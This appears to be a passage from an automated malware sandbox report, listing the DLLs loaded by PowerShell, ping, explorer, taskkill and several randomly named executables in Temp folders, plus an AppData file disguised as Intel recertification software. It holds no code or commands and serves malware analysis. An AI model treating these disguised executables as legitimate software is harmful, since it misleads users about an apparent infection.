Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: explorerframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
